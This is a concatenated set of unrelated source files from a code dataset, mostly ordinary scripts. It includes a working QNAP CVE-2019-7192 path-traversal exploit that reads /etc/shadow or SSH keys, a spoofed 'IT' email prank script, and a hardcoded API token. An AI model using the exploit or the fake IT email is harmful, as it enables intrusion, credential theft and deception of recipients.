labels should have same length\"\n\n # Create a Dataset serving batches of images and labels\n # We don't repeat for multiple epochs because we always train and evaluate for one epoch\n parse_fn = lambda img, l: _parse_function(img, l, params.image_size)\n\n if is_training:\n dataset = (tf.data.Dataset.from_tensor_slices((images, labels))\n .shuffle(num_samples) # whole dataset into the buffer ensures good shuffling\n .repeat(params.num_epochs) # repeat for multiple epochs\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n else:\n dataset = (tf.data.Dataset.from_tensor_slices((images, labels))\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n\n # Return the dataset for tf.estimator (TensorFlow version >= 1.6)\n return dataset\n","sub_path":"model/input_fn.py","file_name":"input_fn.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"107888447","text":"from getch import getch\nimport colors\nimport random\nimport time\n\nsize = 4\n\n\n\n# stuff for printing\ndot = '◉'\nblack = colors.rgb(0,0,0)\nwhite = colors.rgb(255,255,255)\ncyan = colors.cyan\nred = colors.red\nmagenta = colors.rgb(250,0,250)\nyellow = colors.yellow\nfrog = '☻'\nblock = '◯'\nblock = '☗'\nblock = '█'\n\nprint(colors.hide_cursor)\n\ndef make_grid(n):\n return [[0]*n for i in range(n)]\n\ngrid = make_grid(size)\n\n\nfor i in range(size):\n for j in range(size):\n grid[i][j] = i*size + j\n\ndef move_guy(grid, way):\n n = len(grid)\n for i in range(n):\n for j in range(n):\n if grid[i][j] == 1:\n if way == 'up' and grid[(i-1)%n][j] == 0 :\n grid[i][j], grid[(i-1)%n][j] = 0,1\n return\n if way == 'down' and grid[(i+1)%n][j] == 0 : \n grid[i][j], grid[(i+1)%n][j] = 0,1\n return\n if way == 'left' and grid[i][(j-1)%n] == 0 :\n grid[i][j], grid[i][(j-1)%n] = 0,1\n return\n if way == 'right' and grid[i][(j+1)%n] == 0 :\n grid[i][j], grid[i][(j+1)%n] = 0,1\n return\n\ndef mobius_shift(grid, way):\n _new_ = make_grid(size)\n if way == 'right':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j-1)%size]\n for i in range(size):\n _new_[i][0] = grid[-((i+1)%size)][-1]\n return _new_\n\n if way == 'left':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j+1)%size]\n for i in range(size):\n _new_[i][-1] = grid[-((i+1)%size)][0]\n return _new_\n \n if way == 'up':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i+1)%size][j]\n for i in range(size):\n _new_[-1][i] = grid[0][-((i+1)%size)]\n return _new_\n\n if way == 'down':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i-1)%size][j]\n for i in range(size):\n _new_[0][i] = grid[-1][-((i+1)%size)]\n return _new_\n\ndef torus_shift(grid, way):\n _new_ = make_grid(size)\n if way == 'right':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j-1)%size]\n return _new_\n\n if way == 'left':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j+1)%size]\n return _new_\n \n if way == 'up':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i+1)%size][j]\n return _new_\n\n if way == 'down':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i-1)%size][j]\n return _new_\n\n\nbase_nums = ['\\U00002460', 
'\\U00002461', '\\U00002462', '\\U00002463', '\\U00002464', '\\U00002465', '\\U00002466', '\\U00002467', '\\U00002468', '\\U00002469', '\\U0000246a', '\\U0000246b', '\\U0000246c', '\\U0000246d', '\\U0000246e', '\\U0000246f', '\\U00002470', '\\U00002471', '\\U00002472', '\\U00002473',]\n\nboard_colors = [black,yellow,cyan,red,magenta,yellow]\nboard_colors = [colors.bg_rgb(250,250,0),\n colors.bg_rgb(50,150,255),\n colors.bg_rgb(255,80,80),\n colors.bg_rgb(50,205,55)]\n\n#board_colors = [white, black, white, black]\n\nmargin = ' '*5\nwhite = colors.rgb(255,255,255)\nblack = colors.rgb(0,0,0)\n\ndef print_grid(grid):\n for row in grid:\n print(margin + black, end = '')\n for e in row:\n print(board_colors[e%size] + base_nums[e], end = '')\n print(colors.reset)\n print('\\n')\n\n\nleft = '◀' \nright = '▶' \nup = '▲'\ndown = '▼'\n\ndef arrow_string(way):\n return ''\n if way == 'left':\n return margin + white + left + black + up + down + right \n if way == 'up':\n return margin + black + left +white + up +black + down + right \n if way == 'down':\n return margin + black + left + up + white + down + black + right \n if way == 'right':\n return margin + black + left + up + down + white + right + black \n\ndef play_auto(grid):\n print('shuffling')\n key = random.choice(['d','a','w','s'])\n print_grid(grid)\n if key == 'A':\n grid = torus_shift(grid,'up')\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 'D':\n grid = torus_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'C':\n grid = torus_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'B':\n grid = torus_shift(grid,'down')\n print_grid(grid)\n print(arrow_string('down'))\n\n elif key == 'd' or key == '6':\n grid = mobius_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'a' or key == '4':\n grid = mobius_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'w' or key == '8':\n grid = mobius_shift(grid, 'up' )\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 's' or key == '2' or key == '5':\n grid = mobius_shift(grid, 'down' )\n print_grid(grid)\n print(arrow_string('down'))\n return grid\n\n\ndef play(grid):\n print_grid(grid)\n key = getch()[-1]\n\n print_grid(grid)\n if key == 'A':\n grid = torus_shift(grid,'up')\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 'D':\n grid = torus_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'C':\n grid = torus_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'B':\n grid = torus_shift(grid,'down')\n print_grid(grid)\n print(arrow_string('down'))\n\n elif key == 'd' or key == '6':\n grid = mobius_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'a' or key == '4':\n grid = mobius_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'w' or key == '8':\n grid = mobius_shift(grid, 'up' )\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 's' or key == '2' or key == '5':\n grid = mobius_shift(grid, 'down' )\n print_grid(grid)\n print(arrow_string('down'))\n return grid\n\n\"\"\"\n\n#for competition mode\nfor i in range(1000):\n grid = play_auto(grid)\n time.sleep(1)\n\"\"\"\nwhile 1:\n grid = play(grid)\n","sub_path":"games/sixteens.py","file_name":"sixteens.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"88827084","text":"import socket\n\nip_address = '127.0.0.1'\nport_number = 2345\n\nserver_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_sock.bind((ip_address, port_number))\nprint(\"Server socket open...\")\n\nprint(\"Listening...\")\nserver_sock.listen()\n\nclient_sock,addr = server_sock.accept()\nprint(\"Connected with client\")\n\ndata = client_sock.recv(5000)\nprint(\"Received Message from client : \" + data.decode())\n\nclient_sock.send(data)\nprint(\"Send Message back to client\")\n","sub_path":"TCP/simple_example/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"361304586","text":"import smtplib\nimport email.utils\nfrom email.mime.text import MIMEText\nfrom collections import namedtuple\n\n\nPrankee = namedtuple('Prankee', 'name id email')\ncolleague = Prankee('Colleague', 'colleague_id', 'colleague@email.com')\nsubject = '[IT Information] %s we detect unauthorized actions from your account' % colleague.name\nbody = '''Dear user %s (%s),\nIT detected unauthorized actions from your account.\nIf this wasn't you. It's very likely your account has been hacked.\nPlease change you credential immediately.\nHave a great day,\n-your friend in IT\n''' % (colleague.id, colleague.name)\nsender = ('IT-Information', 'IT.Information@email.com')\nrecipients = [(colleague.name, colleague.email)]\n\nmsg = MIMEText(body)\nmsg['To'] = ', '.join([email.utils.formataddr(recpt) for recpt in recipients])\nmsg['From'] = email.utils.formataddr(sender)\nmsg['Subject'] = subject\nwith smtplib.SMTP('localhost', 25000) as server:\n # server.set_debuglevel(True)\n server.sendmail(sender, recipients, msg.as_string())\n","sub_path":"week8/prank.py","file_name":"prank.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"527512908","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1328/A\n\nt = int(input())\nrl = []\nfor i in range(t):\n a,b = list(map(int,input().split()))\n rl.append((b-a%b)%b)\n[print(r) for r in rl]\n \n","sub_path":"codeforces/math数学/800/1328A整除问题.py","file_name":"1328A整除问题.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51493388","text":"def string():\n greeting = \"Spaghet\"\n name = \"ASCII Chess V. 1\"\n doa = \"https://images.chesscomfiles.com/uploads/v1/images_users/tiny_mce/SamCopeland/phpuTejFE.gif\"\n job = \"Our original project, designed to make chess. Note that we did not attempt to reduce the complexity of the code.\"\n embed = \"https://repl.it/@KyleMyint/ASCII-Chess?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef billards():\n greeting = \"Speedrun\"\n name = \"Ultimate Tic Tac Toe\"\n doa = \"https://lh3.googleusercontent.com/proxy/lfnmXruJn_lshuI73aiV7Jc81SPmkOfHXIYMCX2lAONZguCxXODYgvs18zt3rShLNiDneS_PXKnn\"\n job = \"We made this project on a whim, wanting to show something for WOW day. 
We eventually decided to finish it later.\"\n embed = \"https://repl.it/@colinszeto/Python-Hello-Series?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef ship():\n greeting = \"Hey, Hey, Hey!\"\n name = \"Ship with Star Trails\"\n doa = \"Week 2\"\n job = \"Testing Print with Color\"\n embed = \"https://repl.it/@colinszeto/Ship-moving-test?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef alldata():\n return [string(), billards()]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"153159388","text":"\"\"\"\nFebruary 2015\nHowon Byun HB2458\n\"\"\"\nimport P35_f as rCalculator\n\"\"\"\nmain method that takes in user input for given type of calculation one desires\n\"\"\"\ndef main():\n\tgauge = int(input(\"Enter a gauge: \"))\n\td = rCalculator.diamater(gauge)\n\tprint(d)\n\n\tclength = int(input(\"Enter length of copper wire: \"))\n\tcgauge = int(input(\"Enter gauge of copper wire: \"))\n\tcopper = rCalculator.copperWireResistance(clength, cgauge)\n\tprint(copper)\n\n\talength = int(input(\"Enter length of aluminum wire: \"))\n\tagauge = int(input(\"Enter gauge of aluminum wire: \"))\n\taluminum = rCalculator.aluminumWireResistance(alength, agauge)\n\tprint(aluminum)\n\nmain()","sub_path":"Second Assignment/Part 1/P35_m.py","file_name":"P35_m.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470683265","text":"__name__ = \"autoaccept\"\n\nimport engine, pyautogui, threading, pynput\nmouseController = pynput.mouse.Controller()\n\n@engine.load_function(\"autoaccept\")\ndef init_module(self):\n self.mkdir(\"packages/images/\")\n\n@engine.locate_event(\"autoaccept\", \"packages/images/acceptimage.png\", confidence=0.8)\ndef accept_located(self, x, y):\n print(f\"[AutoAccept] Found accept image on x={x}, y={y}\")\n mouseController.position = (x, y)\n mouseController.press(pynput.mouse.Button.left)\n mouseController.release(pynput.mouse.Button.left)","sub_path":"packages/autoaccept.py","file_name":"autoaccept.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"97851551","text":"#!/bin/python3\n\nimport sys\n\ndef catsandamouse(x,y,z):\n distA = abs(z - x)\n distB = abs(z - y)\n if distA > distB:\n return \"Cat B\"\n elif distB > distA:\n return \"Cat A\"\n else:\n return \"Mouse C\"\n\nq = int(input().strip())\nfor a0 in range(q):\n x,y,z = input().strip().split(' ')\n x,y,z = [int(x),int(y),int(z)]\n result = catsandamouse(x,y,z)\n print(result)","sub_path":"hackerrank/implementation/CatsAndAMouse.py","file_name":"CatsAndAMouse.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424416308","text":"from geometry import Cube, origin\n\n\nclass CubeSat(Cube):\n d = {\n '-2': 'lb',\n '-1': 'rf',\n '-0': 'lf',\n '0': 'rb',\n '1': 'lb',\n '2': 'rb'\n }\n activeThruster = None\n activeThrusterCounter = 0\n activeThrusterCounterMaximum = 10\n\n def __init__(self, dimension=1, centroid=origin, mass=1, thrusters=None, randomAV=False):\n super(CubeSat, self).__init__(dimension, centroid, mass, randomAV)\n self.thrusters = 
{thruster.name: thruster for thruster in thrusters}\n\n def apply_thrust(self, thruster):\n self.activeThruster = thruster\n x, y, z = self.thrusters[thruster].thrustDirection\n self._angularVelocity.x += x\n self._angularVelocity.y += y\n self._angularVelocity.z += z\n\n def decide(self):\n avc = self.avc\n if avc != (0, 0, 0):\n setsd = [abs(_) for _ in avc]\n criticalIndex = setsd.index(max(setsd))\n criticalValue = avc[criticalIndex]\n decision = str('{}{}'.format('-' if criticalValue < 0 else '', criticalIndex))\n self.apply_thrust(self.d[decision])\n\n @property\n def atc(self):\n return self.activeThrusterCounter\n\n @property\n def atcm(self):\n return self.activeThrusterCounterMaximum\n\n def print_info(self):\n print(self.activeThruster,\n self._angularVelocity['x'],\n self._angularVelocity['y'],\n self._angularVelocity['z'])\n","sub_path":"cubesat.py","file_name":"cubesat.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"494037170","text":"import numpy as np\nfrom .base_humanoid import HumanoidEnv\n\n\nclass HumanoidHoldToThrowEnv(HumanoidEnv):\n def __init__(self,\n xml_file='robots/humanoid_CMU_with_ball.xml',\n ctrl_cost_weight=0.0,\n contact_cost_weight=0.0,\n contact_cost_range=(-np.inf, 10.0),\n reset_noise_scale=1e-2,\n exclude_current_positions_from_observation=False,\n healthy_reward=2.0,\n terminate_when_unhealthy=True,\n ball_z_range=(0.1, float(\"inf\"))):\n\n self._healthy_reward = healthy_reward\n self._terminate_when_unhealthy = terminate_when_unhealthy\n self._ball_z_range = ball_z_range\n self.started = False\n self.orig_ball_height = None\n self.steps = 0\n self.transfer_steps = 3e6/8\n\n HumanoidEnv.__init__(self,\n xml_file,\n ctrl_cost_weight,\n contact_cost_weight,\n contact_cost_range,\n reset_noise_scale,\n exclude_current_positions_from_observation)\n\n def reset_model(self):\n observation = HumanoidEnv.reset_model(self)\n self.orig_ball_height = None\n return observation\n\n\n @property\n def healthy_reward(self):\n return float(\n self.is_healthy\n or self._terminate_when_unhealthy\n ) * self._healthy_reward\n\n\n @property\n def is_healthy(self):\n min_z, max_z = self._ball_z_range\n ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n is_healthy = min_z < ball_height < max_z\n\n return is_healthy\n\n @property\n def done(self):\n done = ((not self.is_healthy)\n if self._terminate_when_unhealthy\n else False)\n return done\n\n\n def step(self, action):\n ball_x_before = self.sim.data.get_body_xipos('ball')[0]\n self.do_simulation(action, self.frame_skip)\n ball_x_after = self.sim.data.get_body_xipos('ball')[0]\n self.steps += 1\n\n ctrl_cost = self.control_cost(action)\n contact_cost = self.contact_cost\n\n alpha = min(self.steps/self.transfer_steps, 1)\n\n if self.orig_ball_height is None:\n self.orig_ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n\n ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n reward_hold = self.orig_ball_height - abs(self.orig_ball_height - ball_height)\n reward_throw = ball_x_after - ball_x_before\n rewards = (1-alpha) * reward_hold + alpha * reward_throw\n costs = ctrl_cost + contact_cost\n\n reward = rewards - costs\n observation = self._get_obs()\n done = self.done \n if not self.started:\n self.started = True\n done = False\n\n return observation, reward, done, 
{}\n\n","sub_path":"OurEnvs/humanoid_hold_to_throw.py","file_name":"humanoid_hold_to_throw.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"467298802","text":"def is_number(x):\n \"\"\" Является ли 'x' вещественным десятичным числом.\"\"\"\n x = list(x)\n i = \"\" # Для \"склеивания\" в сплошную строку содержимого списка.\n test = 0\n if any((ord(n) < 45 or ord(n) > 46) and (ord(n) < 48 or ord(n) > 57) for n in x):\n test = 1\n elif \"-\" in x and (x.count(\"-\") > 1 or x.index(\"-\") != 0 or (\".\" in x and x.index(\".\") == 1)):\n test = 2\n elif \".\" in x and (x.count(\".\") > 1 or x.index(\".\") == 0 or x.index(\".\") == (len(x)-1)):\n test = 3\n elif \"0\" in x and len(x) > 1 and x[0] == \"0\" and x[1] != \".\":\n test = 4\n elif \"0\" in x and len(x) > 2 and x[0] == \"-\" and x[1] == \"0\" and x[2] != \".\":\n test = 5\n elif len(x) > 1 and all(n == \"0\" or n == \"-\" or n == \".\" for n in x):\n test = 6\n elif len(x) == 1 and x[0] == \"-\":\n test = 7\n else:\n test = 0\n if test == 0:\n# print(i.join(x))\n return True\n elif test > 0:\n return False\n#######################\nwhile True:\n x = input(\"\\ \")\n if is_number(x):\n print(x)\n","sub_path":"python/3rdWeek/is_number.py","file_name":"is_number.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"345913270","text":"import os\nfrom flask import Flask, jsonify, render_template, request\nfrom datetime import datetime, timedelta\napp = Flask(__name__)\n\nimport pyrise\n\n# Log into the Highrise server\npyrise.Highrise.set_server('https://testingaccount1.highrisehq.com/')\npyrise.Highrise.auth('8d067f661c6611c3c3e40b245dd9de37')\n \n# This is the list of tasks that should be attached to each person\ntask_template = []\ntask_template.append(['Send welcome email',1])\ntask_template.append(['Schedule phone call',7])\ntask_template.append(['First phone call',14])\ntask_template.append(['Convert to paid or end trial',40])\ntask_template.append(['Change tag to reflect new status',40])\n\n\n# This is just for testing purposes, to make sure the app is running properly\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\n@app.route('/test')\ndef test_app():\n\treturn render_template('test.html')\n\n\n@app.route('/add_to_highrise')\ndef add_hr():\n\tpass\n\t'''Receives a signup request from JSON, sends it to Highrise with attached signup tasks'''\n\t'''\n\t#Receive JSON data\n\tname = request.args.get('name')\n\temail = request.args.get('email')\n\tcompany = request.args.get('company')\n\tcountry = request.args.get('country')\n\t\n\t#Split name into first and last name. 
If there's no space, then we don't split\n\tsplitter = name.find(\" \")\n\tif splitter == -1:\n\t\tfirst_name = name\n\t\tlast_name = \"\"\n\telse:\n\t\tfirst_name = name[:splitter]\n\t\tlast_name = name[splitter+1:]\n\t\n\t#Create new person in Highrise\n\tp = pyrise.Person()\n\tp.first_name = first_name\n\tp.last_name = last_name\t\t\n\tp.contact_data.email_addresses.append(pyrise.EmailAddress(address=email))\n\t\n\tp.save()\n\t\n\tp.add_note('Company name: ' + company + \", located in \" + country)\n\tp.add_tag('Website signup')\n\t\n\t# Add tasks to the person\n\tfor eachtask in task_template:\n\t\t\n\t\tt = pyrise.Task()\n\t\tt.body = eachtask[0]\n\t\tt.due_at = datetime.now() + timedelta(days=eachtask[1])\n\t\tt.subject_id = p.id\t\n\t\tt.subject_type = 'Party'\t\n\t\tt.save()\n\t\n\treturn jsonify(result=first_name + \" \" + last_name + \" \" + country)'''\n\n\nif __name__ == '__main__':\n\t# Bind to PORT if defined, otherwise default to 5000.\n\tport = int(os.environ.get('PORT', 5000))\n\tapp.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117024757","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/hooks/hdfs_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3967 bytes\nfrom airflow import configuration\nfrom airflow.exceptions import AirflowException\nfrom airflow.hooks.base_hook import BaseHook\ntry:\n from snakebite.client import Client, HAClient, Namenode, AutoConfigClient\n snakebite_loaded = True\nexcept ImportError:\n snakebite_loaded = False\n\nclass HDFSHookException(AirflowException):\n pass\n\n\nclass HDFSHook(BaseHook):\n __doc__ = \"\\n Interact with HDFS. This class is a wrapper around the snakebite library.\\n\\n :param hdfs_conn_id: Connection id to fetch connection info\\n :type hdfs_conn_id: str\\n :param proxy_user: effective user for HDFS operations\\n :type proxy_user: str\\n :param autoconfig: use snakebite's automatically configured client\\n :type autoconfig: bool\\n \"\n\n def __init__(self, hdfs_conn_id='hdfs_default', proxy_user=None, autoconfig=False):\n if not snakebite_loaded:\n raise ImportError('This HDFSHook implementation requires snakebite, but snakebite is not compatible with Python 3 (as of August 2015). 
Please use Python 2 if you require this hook -- or help by submitting a PR!')\n self.hdfs_conn_id = hdfs_conn_id\n self.proxy_user = proxy_user\n self.autoconfig = autoconfig\n\n def get_conn(self):\n \"\"\"\n Returns a snakebite HDFSClient object.\n \"\"\"\n effective_user = self.proxy_user\n autoconfig = self.autoconfig\n use_sasl = configuration.conf.get('core', 'security') == 'kerberos'\n try:\n connections = self.get_connections(self.hdfs_conn_id)\n if not effective_user:\n effective_user = connections[0].login\n if not autoconfig:\n autoconfig = connections[0].extra_dejson.get('autoconfig', False)\n hdfs_namenode_principal = connections[0].extra_dejson.get('hdfs_namenode_principal')\n except AirflowException:\n if not autoconfig:\n raise\n\n if autoconfig:\n client = AutoConfigClient(effective_user=effective_user, use_sasl=use_sasl)\n else:\n if len(connections) == 1:\n client = Client((connections[0].host), (connections[0].port), effective_user=effective_user,\n use_sasl=use_sasl,\n hdfs_namenode_principal=hdfs_namenode_principal)\n else:\n if len(connections) > 1:\n nn = [Namenode(conn.host, conn.port) for conn in connections]\n client = HAClient(nn, effective_user=effective_user, use_sasl=use_sasl,\n hdfs_namenode_principal=hdfs_namenode_principal)\n else:\n raise HDFSHookException(\"conn_id doesn't exist in the repository and autoconfig is not specified\")\n return client","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/hdfs_hook.cpython-36.py","file_name":"hdfs_hook.cpython-36.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284929597","text":"import setuptools\r\nfrom canoser.version import version\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n content = fh.read()\r\n arr = content.split(\"\\n\")\r\n long_description = \"\\n\".join(arr[4:])\r\n\r\nsetuptools.setup(\r\n name=\"canoser\",\r\n version=version,\r\n author=\"yuan xinyu\",\r\n author_email=\"yuanxinyu.hangzhou@gmail.com\",\r\n description=\"A python implementation of the LCS(Libra Canonical Serialization) for the Libra network.\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/yuan-xy/canoser-python.git\",\r\n packages=setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567377057","text":"# proj4_william_verthein.py\n#\n# This program takes a grid of numbers as input to be evaluated.\n# It then determines whether the grid is a Lo Shu Magic Square or not.\n#\ndef main():\n '''The program starts by taking the file input and building a matrix from the data. The data is then evaluated to ensure all rows, columns, and each diagonal adds up to 15. It's then evaluated to ensure there are no repeated numbers in the square. This program can be used with any size square.'''\n\n matrix = read_file()\n if not row_sum(matrix) or not column_sum(matrix) or not diagonal_sum(matrix) or not duplicate_test(matrix):\n print(\"The inputted grid is NOT a Lo Shu Magic Square. Sorry.\")\n else:\n print(\"Miraculously, this is a Lo Shu Magic Square. 1 of 8 in fact...\")\n\n# Read file input by the user. 
Also, forms the matrix of the Magic Square.\ndef read_file():\n file_name = input('Enter the name of your Lo Shu Magic Square file: ')\n with open(file_name, \"r\") as f:\n matrix = [[int(c) for c in line.strip('\\n').split(',')] for line in f]\n for i in range(len(matrix)):\n print(matrix[i])\n return matrix\n\n# Function takes matrix argument, and evaluates each row to ensure they add\n# up to 15\ndef row_sum(matrix):\n for i in range(len(matrix)):\n total = 0\n for j in range(len(matrix)):\n total += matrix[i][j]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates each column to ensure they\n# add up to 15\ndef column_sum(matrix):\n for j in range(len(matrix)):\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][j]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates each diagonal to ensure they\n# add up to 15\ndef diagonal_sum(matrix):\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][i]\n if total != 15:\n return False\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][-1-i]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates whether there are duplicate\n# digits in the square\ndef duplicate_test(matrix):\n nmbr_lst = []\n for i in range(len(matrix)):\n nmbr_lst += matrix[i]\n nmbr_lst.sort()\n return nmbr_lst == list(range(1,len(nmbr_lst)+1))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"proj4_william_verthein.py","file_name":"proj4_william_verthein.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"170991924","text":"#!/usr/bin/python3\n\nimport requests\nimport re\nimport sys\n\n# hide ssl error\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n# Console colors\nW = '\\033[0m' # white (normal)\nR = '\\033[31m' # red\nG = '\\033[32m' # green\n\n\ndef QNAP_CVE_2019_7192(victim_ip):\n try:\n # perform RCE and check if payload sent successfully\n exploit_result = file_disclosure(victim_ip)\n if exploit_result:\n print(G+'QNAP_CVE_2019_7192 exploit successful!'+W)\n return 'QNAP_CVE_2019_7192 exploit successful!'\n else:\n print(R+'QNAP_CVE_2019_7192 exploit failed!'+W)\n return 'QNAP_CVE_2019_7192 exploit failed!'\n except KeyboardInterrupt:\n print('\\n' + 'Program exiting...')\n sys.exit()\n\n\ndef file_disclosure(victim_ip):\n url = 'http://' + victim_ip + ':8080'\n req = requests.Session()\n post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}\n album_id_response = req.post(\n url + \"/photo/p/api/album.php\", data=post_data, verify=False, timeout=10)\n\n # if no album id\n if album_id_response.status_code != 200:\n print(R+\"Album ID not found! Not vulnerable!\"+W)\n return False\n\n album_id = re.search('(?<=).*?(?=)',\n album_id_response.text).group()\n\n access_code_response = req.get(\n url + \"/photo/slideshow.php?album=\" + album_id, verify=False, timeout=10)\n\n # if no access code\n if access_code_response.status_code != 200:\n print(R+\"Access code not found! 
Not vulnerable!\"+W)\n return False\n\n access_code = re.search(\n \"(?<=encodeURIComponent\\\\(').*?(?=')\", access_code_response.text).group()\n\n # ask for file to read\n print(\"Possible interesting files:\")\n print(\"/etc/passwd\")\n print(\"/etc/shadow\")\n print(\"/etc/hostname\")\n print(\"/root/.ssh/id_rsa\")\n file_to_read = input(\"Enter the file to read: \")\n file_to_read_traversed = \"./../../../../..\" + file_to_read\n\n post_data = {'album': album_id, 'a': 'caption',\n 'ac': access_code, 'f': 'UMGObv', 'filename': file_to_read_traversed}\n file_read_response = req.post(\n url + \"/photo/p/api/video.php\", data=post_data, verify=False, timeout=10)\n\n print()\n print(file_to_read + \" file content:\")\n print(file_read_response.text)\n return True\n","sub_path":"exploits/NAS/QNAP_CVE_2019_7192.py","file_name":"QNAP_CVE_2019_7192.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"539664032","text":"from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.txt')) as f:\n long_description = f.read()\n\nsetup(\n name='KalturaApiClient',\n version='15.20.0',\n url='https://github.com/kaltura/KalturaGeneratedAPIClientsPython',\n packages=['KalturaClient', 'KalturaClient.Plugins'],\n install_requires=['requests>=2.4.2', 'requests-toolbelt', 'six'],\n license='AGPLv3+',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n\n 'License :: OSI Approved :: GNU Affero General Public License v3 or later 